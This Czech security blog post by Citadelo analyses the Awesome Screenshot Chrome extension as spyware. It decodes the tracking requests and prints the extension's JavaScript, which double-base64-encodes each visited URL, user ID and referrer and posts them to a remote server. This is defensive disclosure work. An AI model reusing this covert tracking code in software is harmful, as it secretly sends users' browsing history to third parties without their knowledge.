awesome

Rozšíření Awesome screenshot vás špehuje

Máte rádi své soukromí? I společnost SimilarWeb ho má určitě ráda. V dnešním blogu se Vás pokusíme varovat před rozšířením populárního prohlížeče Chrome které Vás mimo jiné špehuje.

Určitě jste již několik krát potřebovali vyfotit obrazovku svého počítače a poslat ji Vašemu blízkému kolegovi známému, atd. Tvorbu screenshotů Vám usnadňují různé tzv. "Snipping tools" představující softwarové nástroje, které dokáží snímků nejen vyfotit ale i oříznout a následně ho uložit ve Vašem oblíbeném grafickém formátu. Tyto soubory pak můžete později nahrát na obrázkový hosting nebo cloudovou službu případně poslat mailem.

 Člověk je tvor líný a ocení nástroj, který zvládne všechny zmíněné akce v jednom. Jedním z nich je poměrně oblíbené rozšíření Awesome screenshots. Jeho oblíbenosti nasvědčuje statistika s více než 1 303 000 stažení uživateli. Odvrácenou stránkou tohoto softwaru je, že Vás špehuje. Awesome screenshot zaznamenává každou navštívenou adresu a spolu s metadaty ji odesílá na servery společnosti SimilarWeb. Tyto informace jsou stávají zajímavým materiálem a potenciálním předmětem dalšího prodeje pro společnosti třetích stran.

 Awesome screenshot je tedy klasickou ukázkou spyware. Spyware je definován jako počítačový program, případně jeho rozšíření, které bez vědomí uživatele pokouší "vyšpehovat" citlivá data z počítače. Tato data následně vynáší třetí straně znovu bez vědomí uživatele.

Jak tento spyware funguje?

Následující obrázky znázorňují odchozí požadavky POST na servery s821.crdui.com a 821.crdui.com.

awesome awesome

Doména crdui.com je registrovaná přes godaddy.com po zadání linky do prohlížeče následuje přesměrování na http://t2.webovernet.com/service2. Webovernet.com vlastní firma SimilarWeb, která s Vašimi údaji zachází podle vlastního uvážení.

V odesílaných požadavcích je největším parametrem parametr e. Po dvojitém dekódování pomocí base64 jsme získali následující údaje:

s=1821&md=21&pid=njgPlkgPyO&sess=186081867199391140&sub=chrome&q=https://www.citadelo.sk/&tmv=4002.1&tmf=1&r=http://citadelo.sk/

Ty jsme podrobili analýze a pokusili se odhadnout jejich význam:

Parameter Hodnota Význam
s 1821,821 identifikátor servera
md 21 konstanta
pid njg7v2uxPlgtPyO identifikátor uživatele
sess 186081867199391140 číslo relacie
sub chrome použitý prohlížeč
q https://www.citadelo.sk/ URL (adresa navštívené stránky)
tmv 4002.1 konstanta
tmf 1 pokud je nastaven referer tak 1 jinak 0
r http://citadelo.com/ http referer (adresa předchozí webové stránky, ze které byl požadavek na navštívenou stránku generována)

Během zkoumání zdrojového kódu rozšíření jsme narazili na části, které se starají o funkcionalitu spyware-u. Z úryvku zdrojového kódu uvedeného níže je zřejmé, že naše odhady byly správné. Pokud byste si to chtěli vyzkoušet a nahlédnout do samotného zdrojového kódu rozšíření, stačí si v nastaveních rozšíření povolit Developer mode. Soubor, který byste určitě neměli přehlédnout je tr.js.

var data = "s=" + SIM_Config_BG.getSourceId() + "&md=21&pid=" + utils.db.get("userid") + "&sess=" + SIM_Session.getSessionId() + "&q=" + encodeURIComponent(tab_url) + "&prev=" + encodeURIComponent(res_prev_url) + "&link=" + (ref ? "1" : "0")<br /> + "&sub=chrome&hreferer=" + encodeURIComponent(ref);<br /> data = data + "&tmv=" + SIM_ModuleConstants._TMV;<br /> data = SIM_Base64.encode(SIM_Base64.encode(data));<br /> data = "e=" + data;<br /> var url = utils.db_tmv.get("server") + "/related";<br /> utils.net.post(url, "json", data, function(result) {<br /> log.INFO("Succeeded in posting data");<br /> tabs_prevs[tabId] = tab_url<br /> }, function(httpCode) {<br /> log.INFO("Failed to retrieve content. (HTTP Code:" + httpCode.status + ")");<br /> log.ERROR("ERROR 8004 ??");<br /> tabs_prevs[tabId] = tab_url<br /> })

.

Hrozby

V tom lepším případě vám "hrozí" jen reklama šitá na míru. Nicméně případné dlouhodobé sledování uživatele umožní společnostem vyprofilovat jeho chování ba dokonce ke shromážděným datům přiřadit jeho reálnou identitu. Program Google Developer přitom v sekci věnované rozšířením jasně tvrdí, že "Nepovolujeme neautorizované publikování soukromí a důvěrných informací jako jsou například čísla kreditních karet čísla občanských průkazů, řidičských průkazů ani jiné informace které nejsou veřejnosti jinak dostupné." V dalším ze scénářů může dojít ke krádeži identity. Některé aplikace přenášejí identifikátor relace (session id) přímo v URL. Takové chování odporuje dobrým bezpečnostním praktikám a dá se předpokládat, že bezpečnost takové aplikace nebude dobrá ani v jiných ohledech. Faktem ale zůstává, že při takové aplikaci z Vašeho systému uniká vše potřebné pro to, aby lidé ze SimilarWeb ukradli vaši identitu.

Pokud máte Awesome Screenshot nainstalovaný doporučujeme ho okamžitě odinstalovat.

O autorovi

Citadelo
Citadelo je dům plný etických hackerů na vaší straně. Myslíme jako útočník, avšak nezneužíváme toho. Ba naopak, naším hlavním cílem je odhalit zranitelnost bez napáchaných škod. Pro naše klienty připravujeme simulované útoky již od roku 2006. Pomáháme otestovat jejich informační bezpečnost. Podrobte své IT prostředí výzvě a odhalte, do jaké míry jsou vaše citlivá data chráněna.
Zobrazit více od autora

Podobné blogy

Bezpečnost na internetu – umíte se chovat v online prostředí bezpečně?

blog |
Průměrný člověk stráví na internetu každý den 3 hodiny a 20 minut. Kromě užitečných informací a zábavy ale na nás čeká v online světě i velké množství hrozeb.
Zobrazit

Hackeři radí, jak ukrýt svoji identitu v online prostředí

blog |
Potřeba ochrany svého soukromí ve společnosti existuje od nepaměti, ale s příchodem moderních komunikačních prostředků nabrala nový rozměr.
Zobrazit

Co jsou cookies, k čemu slouží a máme se jich bát?

blog | | Tomáš Melicher
V tomto blogu vám chceme popsat principy cookies ve webových prohlížečích, jak cookies souvisejí s IT bezpečností a jeslti je jich máte proč bát.
Zobrazit

Citadelo na novém a ještě bezpečnějším webu

Blog | | Michaela Gallee
Náš požadavek na bezpečný web se může někomu zdát přehnaný, nejsme přece světová banka. To však nic nemění na tom, že naší vizí je bezpečný internet, a proto naše priorita byla kladena na bezpečnost.
Zobrazit